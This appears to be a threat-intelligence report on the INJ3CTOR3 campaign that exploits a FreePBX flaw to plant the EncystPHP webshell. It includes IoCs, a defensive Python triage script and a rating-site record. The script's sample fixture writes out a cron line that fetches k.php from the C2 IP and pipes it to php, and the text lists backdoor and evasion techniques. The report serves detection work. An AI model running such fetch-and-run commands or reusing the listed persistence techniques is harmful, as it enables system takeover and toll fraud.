FreePBX and Indian technology firm: Hackers Exploiting FreePBX Vulnerability to Deploy Webshell and Gain Control of Systems

Sophisticated FreePBX Attack Campaign Deploys Persistent "EncystPHP" Webshell

A financially motivated hacker group, INJ3CTOR3, has launched a targeted attack campaign exploiting CVE-2025-64328, a critical post-authentication command-injection vulnerability in FreePBX’s Endpoint Manager. The campaign, active since early December 2025, deploys EncystPHP, a highly evasive webshell granting attackers full administrative control over compromised VoIP and PBX systems.

Exploitation & Attack Chain

The flaw lies in the check_ssh_connect() function of the Filestore component and lets an authenticated attacker execute arbitrary commands as the asterisk user, the account under which Asterisk itself runs. Because exploitation requires a valid administrator session, internet-exposed admin portals with weak or reused credentials are the practical precondition. Attack traffic originated from Brazil and targeted cloud-based VoIP environments managed by an Indian technology firm.

Threat actors downloaded the EncystPHP dropper from 45[.]234[.]176[.]202, a server masquerading as a VoIP management portal (crm[.]razatelefonia[.]pro). The initial dropper then fetches a secondary dropper (k.php), which writes the webshell to disk.

EncystPHP Capabilities & Persistence

The webshell, disguised as ajax.php, employs MD5-hashed authentication and an interactive "Ask Master" interface for remote command execution. Key features include:

  • Multi-stage persistence: Cron jobs, redundant droppers in /var/www/html/, and forged timestamps to evade detection.
  • Privilege escalation: Creates a root-level "newfpbx" account, resets user passwords, and injects SSH keys for backdoor access.
  • Evasion techniques: Modifies file permissions, disables error logging, and removes competing malware.
  • Telephony abuse: Enumerates SIP peers, Asterisk channels, and initiates unauthorized calls for toll fraud.

Attribution & Historical Context

INJ3CTOR3, active since 2020, has a history of targeting VoIP systems for financial gain. Previous campaigns exploited:

  • CVE-2019-19006 (FreePBX, 2020)
  • CVE-2021-45461 (Elastix, 2022)

Indicators of Compromise (IoCs)

  • C2 Infrastructure: 45[.]234[.]176[.]202, 187[.]108[.]1[.]130, crm[.]razatelefonia[.]pro
  • Webshell Hashes:
    • 71d94479d58c32d5618ca1e2329d8fa62f930e0612eb108ba3298441c6ba0302 (EncystPHP)
    • 7e3a47e3c6b82eb02f6f1e4be6b8de4762194868a8de8fc9103302af7915c574 (Dropper)
  • File Paths: /var/www/html/admin/views/ajax.php, /var/www/html/rest_phones/ajax.php
  • Detection Signatures: PHP/EncystPHP.A!tr, IPS Signature 59448
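The IoCs above translate directly into a host-based triage check. The script below is an added example written for this page, not code from the article, from FreePBX/Sangoma or from the researchers. It scans a filesystem root for the published webshell paths and SHA-256 hashes (including renamed copies under the document root), the "newfpbx" account, populated authorized_keys files for root and asterisk, and cron entries that reference the dropper or the C2 hosts. The key-file and cron locations, the function names and the constructed sample tree are this example's own assumptions; the sample tree contains a placeholder file, not the real webshell.

```python
"""Triage a FreePBX host for the EncystPHP indicators published above.

Added example (not the article's or the project's own code). Run as root:
    python3 encyst_triage.py [/path/to/root]
"""
import hashlib
import os
import sys
import tempfile
from pathlib import Path

# Indicators copied from the article's IoC section.
IOC_HASHES = {
    "71d94479d58c32d5618ca1e2329d8fa62f930e0612eb108ba3298441c6ba0302": "EncystPHP webshell",
    "7e3a47e3c6b82eb02f6f1e4be6b8de4762194868a8de8fc9103302af7915c574": "EncystPHP dropper",
}
IOC_PATHS = [
    "var/www/html/admin/views/ajax.php",
    "var/www/html/rest_phones/ajax.php",
]
IOC_ACCOUNT = "newfpbx"
IOC_HOSTS = ["45.234.176.202", "187.108.1.130", "crm.razatelefonia.pro"]
# Assumption: where authorized_keys and cron entries normally live on a FreePBX host.
KEY_FILES = [
    "root/.ssh/authorized_keys",
    "var/lib/asterisk/.ssh/authorized_keys",
    "home/asterisk/.ssh/authorized_keys",
]
CRON_DIRS = ["var/spool/cron", "etc/cron.d"]
CRON_TOKENS = ("ajax.php", "k.php", *IOC_HOSTS)


def sha256_of(path: Path) -> str:
    """Stream-hash a file so large artefacts do not need to fit in memory."""
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def scan_for_iocs(root="/") -> list[str]:
    """Return one human-readable finding per indicator hit under `root`."""
    root = Path(root)
    findings = []

    # 1. Known webshell paths: report whether the content matches a published hash.
    for rel in IOC_PATHS:
        p = root / rel
        if p.is_file():
            digest = sha256_of(p)
            label = IOC_HASHES.get(digest, "hash not in IoC list, inspect manually")
            findings.append(f"file {rel}: {label} ({digest[:12]}...)")

    # 2. Renamed copies: any PHP under the docroot whose hash is a known sample.
    webroot = root / "var/www/html"
    if webroot.is_dir():
        for p in webroot.rglob("*.php"):
            rel = p.relative_to(root).as_posix()
            if rel not in IOC_PATHS and sha256_of(p) in IOC_HASHES:
                findings.append(f"file {rel}: {IOC_HASHES[sha256_of(p)]} (renamed copy)")

    # 3. The backdoor account the campaign creates.
    passwd = root / "etc/passwd"
    if passwd.is_file():
        for line in passwd.read_text().splitlines():
            fields = line.split(":")
            if fields and fields[0] == IOC_ACCOUNT:
                uid = fields[2] if len(fields) > 2 else "?"
                findings.append(f"account {IOC_ACCOUNT} present (uid {uid})")

    # 4. Injected SSH keys: any non-comment entry is worth a manual review.
    for rel in KEY_FILES:
        p = root / rel
        if p.is_file():
            keys = [l for l in p.read_text().splitlines() if l.strip() and not l.startswith("#")]
            if keys:
                findings.append(f"{rel}: {len(keys)} authorized key(s), verify each against known admins")

    # 5. Cron persistence that re-fetches or re-runs the dropper.
    for rel in CRON_DIRS:
        d = root / rel
        if not d.is_dir():
            continue
        for p in (x for x in d.rglob("*") if x.is_file()):
            for line in p.read_text(errors="replace").splitlines():
                if any(tok in line for tok in CRON_TOKENS):
                    findings.append(f"cron {p.relative_to(root).as_posix()}: {line.strip()}")
    return findings


def build_sample_root() -> str:
    """Constructed sample tree (placeholder content, not the real malware)."""
    root = Path(tempfile.mkdtemp(prefix="encyst_demo_"))
    (root / "var/www/html/admin/views").mkdir(parents=True)
    (root / "var/www/html/admin/views/ajax.php").write_bytes(b"<?php // placeholder\n")
    (root / "etc").mkdir()
    (root / "etc/passwd").write_text("root:x:0:0:root:/root:/bin/bash\nnewfpbx:x:0:0::/root:/bin/bash\n")
    (root / "var/spool/cron").mkdir(parents=True)
    (root / "var/spool/cron/asterisk").write_text("* * * * * curl -s http://45.234.176.202/k.php | php\n")
    return str(root)


if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else build_sample_root()
    hits = scan_for_iocs(target)
    print("\n".join(hits) if hits else "no EncystPHP indicators found")
    sys.exit(1 if hits else 0)
```

A non-zero exit on any hit makes the script usable from a fleet-wide SSH loop. A hit on the published path whose hash does not match still warrants inspection: the article notes the actors forge timestamps and keep redundant droppers, so a modified or repacked copy will not hash-match.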

The attack underscores the persistent targeting of VoIP infrastructure for monetization, with unpatched FreePBX systems at high risk of full compromise.

Source: https://cybersecuritynews.com/freepbx-vulnerability-exploited/

YASH Technologies cybersecurity rating report: https://www.rankiteo.com/company/yash-technologies

FreePBX cybersecurity rating report: https://www.rankiteo.com/company/freepbx

"id": "YASFRE1769690560",
"linkid": "yash-technologies, freepbx",
"type": "Vulnerability",
"date": "12/2025",
"severity": "100",
"impact": "5",
"explanation": "Attack threatening the organization's existence"
{'affected_entities': [{'industry': 'VoIP/Telecommunications',
                        'location': 'India',
                        'name': 'Indian technology firm (unnamed)',
                        'type': 'Technology Firm'}],
 'attack_vector': 'Exploitation of CVE-2025-64328 (post-authentication '
                  'command-injection vulnerability in FreePBX’s Endpoint '
                  'Manager)',
 'date_detected': '2025-12-01',
 'description': 'A financially motivated hacker group, INJ3CTOR3, has launched '
                'a targeted attack campaign exploiting CVE-2025-64328, a '
                'critical post-authentication command-injection vulnerability '
                'in FreePBX’s Endpoint Manager. The campaign deploys '
                'EncystPHP, a highly evasive webshell granting attackers full '
                'administrative control over compromised VoIP and PBX systems.',
 'impact': {'financial_loss': 'Toll fraud',
            'operational_impact': 'Full administrative control over '
                                  'compromised systems',
            'systems_affected': 'VoIP and PBX systems'},
 'initial_access_broker': {'backdoors_established': 'SSH keys, root-level '
                                                    "'newfpbx' account",
                           'entry_point': 'CVE-2025-64328 (FreePBX Endpoint '
                                          'Manager)',
                           'high_value_targets': 'VoIP and PBX systems'},
 'motivation': 'Financial gain',
 'post_incident_analysis': {'root_causes': 'Unpatched FreePBX systems, '
                                           'exploitation of CVE-2025-64328'},
 'references': [{'source': 'Threat Intelligence Report'}],
 'threat_actor': 'INJ3CTOR3',
 'title': 'Sophisticated FreePBX Attack Campaign Deploys Persistent '
          "'EncystPHP' Webshell",
 'type': 'Webshell Deployment',
 'vulnerability_exploited': 'CVE-2025-64328'}